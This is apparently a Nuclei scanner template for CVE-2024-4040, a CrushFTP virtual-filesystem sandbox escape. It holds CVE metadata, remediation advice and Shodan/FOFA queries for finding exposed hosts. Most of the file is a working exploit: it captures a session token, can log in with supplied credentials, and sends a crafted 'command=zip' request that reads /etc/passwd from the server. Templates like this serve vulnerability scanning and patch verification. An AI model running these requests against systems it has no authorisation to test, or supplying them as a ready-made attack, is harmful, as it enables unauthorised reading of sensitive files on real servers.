id: CVE-2024-4040
info:
name: CrushFTP VFS - Sandbox Escape LFR
author: DhiyaneshDK,pussycat0x
severity: critical
description: |
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
reference:
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-4040
cwe-id: CWE-94,CWE-1336
epss-score: 0.016
epss-percentile: 0.87316
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: crushftp
product: crushftp
shodan-query:
- "html:\"CrushFTP\""
- http.html:"crushftp"
fofa-query: "body=\"crushftp\""
tags: cve,cve2024,lfr,crushftp,vfs,kev
flow: |
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
// if username or password is not provided, run unauthenticated exploit
http("unauth-exploit")
} else {
// if username and password is provided, run login script and authenticated exploit
http("login") && http("auth-exploit")
}
http:
# unauthenticated exploit
- id: unauth-exploit
raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=/etc/passwd&names=/bbb HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "root:x:"
- type: word
part: header
words:
- "text/xml"
extractors:
- type: regex
name: auth
internal: true
part: header_1
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
# login script
- id: login
raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 111
Origin: {{RootURL}}
Referer: http://{{RootURL}}/WebInterface/login.html
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body_2
internal: true
words:
- "success"
- type: word
part: header_2
internal: true
words:
- "text/xml"
extractors:
- type: regex
name: auth
internal: true
part: header_2
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
# authenticated exploit
- id: auth-exploit
raw:
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=/etc/passwd&names=/bbb HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "root:x:"
# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950